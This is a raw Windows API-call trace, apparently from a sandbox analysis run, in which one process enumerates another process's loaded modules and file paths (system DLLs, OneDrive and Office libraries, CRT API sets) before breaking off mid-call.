0xb [0046.590] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc130000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PROPSYS.dll" (normalized: "c:\\windows\\system32\\propsys.dll")) returned 0x1f [0046.592] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd720000, lpmodinfo=0x25ad8a0, cb=0x18 | out: lpmodinfo=0x25ad8a0*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0046.594] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd720000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0046.596] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd720000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0046.597] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x25afc78, cb=0x18 | out: lpmodinfo=0x25afc78*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0046.599] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0046.601] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0046.603] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc2b0000, lpmodinfo=0x25b1e48, cb=0x18 | out: lpmodinfo=0x25b1e48*(lpBaseOfDll=0x7fefc2b0000, SizeOfImage=0x1f4000, EntryPoint=0x7fefc43c924)) returned 1 [0046.605] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc2b0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0046.608] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc2b0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")) returned 0x7c [0046.610] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb30000, lpmodinfo=0x25b40d0, cb=0x18 | out: lpmodinfo=0x25b40d0*(lpBaseOfDll=0x7fefbb30000, SizeOfImage=0x12a000, EntryPoint=0x7fefbb33810)) returned 1 [0046.612] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb30000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="WindowsCodecs.dll") returned 0x11 [0046.614] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb30000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll")) returned 0x25 [0046.616] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd780000, lpmodinfo=0x25b62b0, cb=0x18 | out: lpmodinfo=0x25b62b0*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0046.618] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd780000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0046.620] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd780000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0046.622] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa0f0000, lpmodinfo=0x25b8470, cb=0x18 | out: lpmodinfo=0x25b8470*(lpBaseOfDll=0x7fefa0f0000, SizeOfImage=0x57000, EntryPoint=0x7fefa0f1118)) returned 1 [0046.624] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa0f0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0046.626] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa0f0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")) returned 0x1f [0046.628] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x25ba630, cb=0x18 | out: lpmodinfo=0x25ba630*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0046.630] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0046.633] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0046.635] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef91a0000, lpmodinfo=0x25bc7f0, cb=0x18 | out: lpmodinfo=0x25bc7f0*(lpBaseOfDll=0x7fef91a0000, SizeOfImage=0x56000, EntryPoint=0x7fef91a86e8)) returned 1 [0046.637] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef91a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="FileSyncShell64.dll") returned 0x13 [0046.639] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef91a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll")) returned 0x5c [0046.641] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8ee0000, lpmodinfo=0x25bea40, cb=0x18 | out: lpmodinfo=0x25bea40*(lpBaseOfDll=0x7fef8ee0000, SizeOfImage=0xa7000, EntryPoint=0x7fef8f2b93c)) returned 1 [0046.643] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8ee0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="MSVCP110.dll") returned 0xc [0046.645] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8ee0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\MSVCP110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll")) returned 0x55 [0046.648] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8e10000, lpmodinfo=0x25c0c78, cb=0x18 | out: lpmodinfo=0x25c0c78*(lpBaseOfDll=0x7fef8e10000, SizeOfImage=0xce000, EntryPoint=0x7fef8e330fc)) returned 1 [0046.650] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8e10000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="MSVCR110.dll") returned 0xc [0046.652] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8e10000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\MSVCR110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll")) returned 0x55 [0046.655] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc940000, lpmodinfo=0x25c2eb0, cb=0x18 | out: lpmodinfo=0x25c2eb0*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0046.657] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc940000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0046.659] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc940000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0046.661] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefde60000, lpmodinfo=0x25c5070, cb=0x18 | out: lpmodinfo=0x25c5070*(lpBaseOfDll=0x7fefde60000, SizeOfImage=0x12a000, EntryPoint=0x7fefde610d4)) returned 1 [0046.664] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefde60000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="WININET.dll") returned 0xb [0046.667] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefde60000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WININET.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0046.669] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff510000, lpmodinfo=0x25c7230, cb=0x18 | out: lpmodinfo=0x25c7230*(lpBaseOfDll=0x7feff510000, SizeOfImage=0x178000, EntryPoint=0x7feff5110e0)) returned 1 [0046.671] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff510000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="urlmon.dll") returned 0xa [0046.674] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff510000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")) returned 0x1e [0046.676] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9e0000, lpmodinfo=0x25c9408, cb=0x18 | out: lpmodinfo=0x25c9408*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0046.679] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0046.682] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0046.685] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd820000, lpmodinfo=0x25cb5c8, cb=0x18 | out: lpmodinfo=0x25cb5c8*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0046.687] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd820000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0046.690] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd820000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0046.692] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefeea0000, lpmodinfo=0x25cd788, cb=0x18 | out: lpmodinfo=0x25cd788*(lpBaseOfDll=0x7fefeea0000, SizeOfImage=0x259000, EntryPoint=0x7fefeea1340)) returned 1 [0046.695] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefeea0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="iertutil.dll") returned 0xc [0046.698] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefeea0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")) returned 0x20 [0046.700] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8bf0000, lpmodinfo=0x25cf958, cb=0x18 | out: lpmodinfo=0x25cf958*(lpBaseOfDll=0x7fef8bf0000, SizeOfImage=0x214000, EntryPoint=0x7fef8bf1000)) returned 1 [0046.703] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8bf0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="GROOVEEX.DLL") returned 0xc [0046.705] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8bf0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\PROGRA~1\\MICROS~1\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\micros~1\\office16\\grooveex.dll")) returned 0x2a [0046.708] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8bd0000, lpmodinfo=0x25d1b38, cb=0x18 | out: lpmodinfo=0x25d1b38*(lpBaseOfDll=0x7fef8bd0000, SizeOfImage=0x19000, EntryPoint=0x7fef8bdee50)) returned 1 [0046.715] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8bd0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="VCRUNTIME140.dll") returned 0x10 [0046.718] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8bd0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VCRUNTIME140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")) returned 0x24 [0046.720] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8bc0000, lpmodinfo=0x25d3d18, cb=0x18 | out: lpmodinfo=0x25d3d18*(lpBaseOfDll=0x7fef8bc0000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0046.723] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8bc0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-crt-runtime-l1-1-0.dll") returned 0x21 [0046.726] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8bc0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll")) returned 0x35 [0046.729] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8ac0000, lpmodinfo=0x25d5f38, cb=0x18 | out: lpmodinfo=0x25d5f38*(lpBaseOfDll=0x7fef8ac0000, SizeOfImage=0xf2000, EntryPoint=0x7fef8ac9060)) returned 1 [0046.731] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8ac0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="ucrtbase.DLL") returned 0xc [0046.734] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8ac0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ucrtbase.DLL" (normalized: "c:\\windows\\system32\\ucrtbase.dll")) returned 0x20 [0046.737] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8ab0000, lpmodinfo=0x25d8108, cb=0x18 | out: lpmodinfo=0x25d8108*(lpBaseOfDll=0x7fef8ab0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0046.739] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8ab0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-core-timezone-l1-1-0.dll") returned 0x23 [0046.771] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8ab0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll")) returned 0x37 [0046.774] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8aa0000, lpmodinfo=0x25da328, cb=0x18 | out: lpmodinfo=0x25da328*(lpBaseOfDll=0x7fef8aa0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0046.777] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8aa0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-core-file-l2-1-0.dll") returned 0x1f [0046.779] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8aa0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll")) returned 0x33 [0046.782] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a90000, lpmodinfo=0x25dc538, cb=0x18 | out: lpmodinfo=0x25dc538*(lpBaseOfDll=0x7fef8a90000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0046.785] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a90000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-core-localization-l1-2-0.dll") returned 0x27 [0046.789] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a90000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll")) returned 0x3b [0046.792] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9210000, lpmodinfo=0x25de768, cb=0x18 | out: lpmodinfo=0x25de768*(lpBaseOfDll=0x7fef9210000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0046.795] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9210000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-core-synch-l1-2-0.dll") returned 0x20 [0046.798] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9210000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")) returned 0x34 [0046.800] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a80000, lpmodinfo=0x25e0988, cb=0x18 | out: lpmodinfo=0x25e0988*(lpBaseOfDll=0x7fef8a80000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0046.803] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a80000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-core-processthreads-l1-1-1.dll") returned 0x29 [0046.806] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a80000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll")) returned 0x3d [0046.809] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a70000, lpmodinfo=0x25e2bc8, cb=0x18 | out: lpmodinfo=0x25e2bc8*(lpBaseOfDll=0x7fef8a70000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0046.812] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a70000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-core-file-l1-2-0.dll") returned 0x1f [0046.816] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a70000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll")) returned 0x33 [0046.819] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a60000, lpmodinfo=0x25e4dd8, cb=0x18 | out: lpmodinfo=0x25e4dd8*(lpBaseOfDll=0x7fef8a60000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0046.822] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a60000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-crt-heap-l1-1-0.dll") returned 0x1e [0046.825] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a60000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll")) returned 0x32 [0046.828] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a50000, lpmodinfo=0x25e6fe8, cb=0x18 | out: lpmodinfo=0x25e6fe8*(lpBaseOfDll=0x7fef8a50000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0046.831] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a50000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-crt-string-l1-1-0.dll") returned 0x20 [0046.835] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a50000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll")) returned 0x34 [0046.838] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a40000, lpmodinfo=0x25e9208, cb=0x18 | out: lpmodinfo=0x25e9208*(lpBaseOfDll=0x7fef8a40000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0046.841] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a40000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-crt-stdio-l1-1-0.dll") returned 0x1f [0046.844] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a40000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll")) returned 0x33 [0046.847] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a30000, lpmodinfo=0x25eb430, cb=0x18 | out: lpmodinfo=0x25eb430*(lpBaseOfDll=0x7fef8a30000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0046.851] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a30000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-crt-convert-l1-1-0.dll") returned 0x21 [0046.854] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a30000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll")) returned 0x35 [0046.858] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8990000, lpmodinfo=0x25ed650, cb=0x18 | out: lpmodinfo=0x25ed650*(lpBaseOfDll=0x7fef8990000, SizeOfImage=0x91000, EntryPoint=0x7fef89e2430)) returned 1 [0046.861] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8990000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="MSVCP140.dll") returned 0xc [0046.864] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8990000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSVCP140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll")) returned 0x20 [0046.867] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8980000, lpmodinfo=0x25ef820, cb=0x18 | out: lpmodinfo=0x25ef820*(lpBaseOfDll=0x7fef8980000, SizeOfImage=0xc000, EntryPoint=0x7fef8984150)) returned 1 [0046.871] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8980000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="VCRUNTIME140_1.dll") returned 0x12 [0046.874] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8980000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VCRUNTIME140_1.dll" (normalized: "c:\\windows\\system32\\vcruntime140_1.dll")) returned 0x26 [0046.877] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8970000, lpmodinfo=0x25f1a00, cb=0x18 | out: lpmodinfo=0x25f1a00*(lpBaseOfDll=0x7fef8970000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0046.882] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8970000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-crt-locale-l1-1-0.dll") returned 0x20 [0046.886] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8970000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll")) returned 0x34 [0046.889] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8960000, lpmodinfo=0x25f4038, cb=0x18 | out: lpmodinfo=0x25f4038*(lpBaseOfDll=0x7fef8960000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0046.892] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8960000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-crt-filesystem-l1-1-0.dll") returned 0x24 [0046.896] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8960000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll")) returned 0x38 [0046.900] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8950000, lpmodinfo=0x25f6268, cb=0x18 | out: lpmodinfo=0x25f6268*(lpBaseOfDll=0x7fef8950000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0046.903] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8950000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-crt-time-l1-1-0.dll") returned 0x1e [0046.906] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8950000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll")) returned 0x32 [0046.910] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8940000, lpmodinfo=0x25f8478, cb=0x18 | out: lpmodinfo=0x25f8478*(lpBaseOfDll=0x7fef8940000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0046.913] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8940000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-crt-environment-l1-1-0.dll") returned 0x25 [0046.917] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8940000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll")) returned 0x39 [0046.920] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8930000, lpmodinfo=0x25fa6a8, cb=0x18 | out: lpmodinfo=0x25fa6a8*(lpBaseOfDll=0x7fef8930000, SizeOfImage=0x5000, EntryPoint=0x0)) returned 1 [0046.924] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8930000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-crt-math-l1-1-0.dll") returned 0x1e [0046.927] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8930000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll")) returned 0x32 [0046.931] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8920000, lpmodinfo=0x25fc8b8, cb=0x18 | out: lpmodinfo=0x25fc8b8*(lpBaseOfDll=0x7fef8920000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0046.934] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8920000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="api-ms-win-crt-utility-l1-1-0.dll") returned 0x21 [0046.938] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8920000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll")) returned 0x35 [0046.942] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8600000, lpmodinfo=0x25fead8, cb=0x18 | out: lpmodinfo=0x25fead8*(lpBaseOfDll=0x7fef8600000, SizeOfImage=0x316000, EntryPoint=0x7fef8603e98)) returned 1 [0046.945] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8600000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="msi.dll") returned 0x7 [0046.949] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8600000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll")) returned 0x1b [0046.953] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7bc0000, 